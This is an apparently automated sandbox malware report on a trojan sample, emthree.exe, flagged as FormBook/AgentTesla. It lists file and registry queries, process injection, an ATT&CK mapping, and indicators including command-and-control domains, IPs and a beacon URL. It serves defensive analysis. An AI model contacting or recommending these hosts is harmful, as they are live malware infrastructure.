          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\emthree.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match; File source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match; File source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | DLL Side-Loading 1 | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Masquerading 1 | Input Capture 1 | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 3 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 1 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 512 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Rundll32 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Software Packing 13 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Timestomp 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
          Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | DLL Side-Loading 1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

          Behavior Graph

          [Behavior graph image not preserved. Behavior Graph ID: 323574; Sample: emthree.exe; Startdate: 27/11/2020; Architecture: WINDOWS; Score: 100]
          Process chain: emthree.exe (started) -> emthree.exe (started) -> explorer.exe (injected) -> rundll32.exe (started) -> cmd.exe (started) -> conhost.exe (started)
          Dropped by the first emthree.exe: C:\Users\user\AppData\...\emthree.exe.log, ASCII
          Contacted by explorer.exe: porncamslivechat.com 184.154.50.243, 49746, 80 SINGLEHOP-LLCUS United States; www.amarilloautoexpress.com 23.27.109.19, 49747, 80 EGIHOSTINGUS United States; 4 other IPs or domains


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          emthree.exe | 41% | Metadefender |
          emthree.exe | 65% | ReversingLabs | Win32.Trojan.AgentTesla
          emthree.exe | 100% | Avira | TR/Kryptik.zirmt
          emthree.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.2.emthree.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.fontbureau.comm | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.fontbureau.comu | 0% | Avira URL Cloud | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.porncamslivechat.com/unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q | 0% | Avira URL Cloud | safe
          http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.amarilloautoexpress.com | 23.27.109.19 | true | true | | unknown
          porncamslivechat.com | 184.154.50.243 | true | true | | unknown
          www.porncamslivechat.com | unknown | unknown | true | | unknown
          www.asojebu.com | unknown | unknown | true | | unknown
          www.haircuressteampod.com | unknown | unknown | true | | unknown

                    Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    http://www.porncamslivechat.com/unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries


                                          Contacted IPs


                                          Public

                                          IP | Domain | Country | ASN | ASN Name | Malicious
                                          23.27.109.19 | unknown | United States | 18779 | EGIHOSTINGUS | true
                                          184.154.50.243 | unknown | United States | 32475 | SINGLEHOP-LLCUS | true

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:31.0.0 Red Diamond
                                          Analysis ID:323574
                                          Start date:27.11.2020
                                          Start time:06:35:16
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 6s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:emthree.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:26
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/1@4/3
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 19.8% (good quality ratio 18%)
                                          • Quality average: 73.7%
                                          • Quality standard deviation: 30.5%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 103
                                          • Number of non-executed functions: 165
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 168.61.161.212, 51.104.139.180, 2.20.84.85, 52.155.217.156, 20.54.26.129, 40.67.254.36, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 204.79.197.200, 13.107.21.200
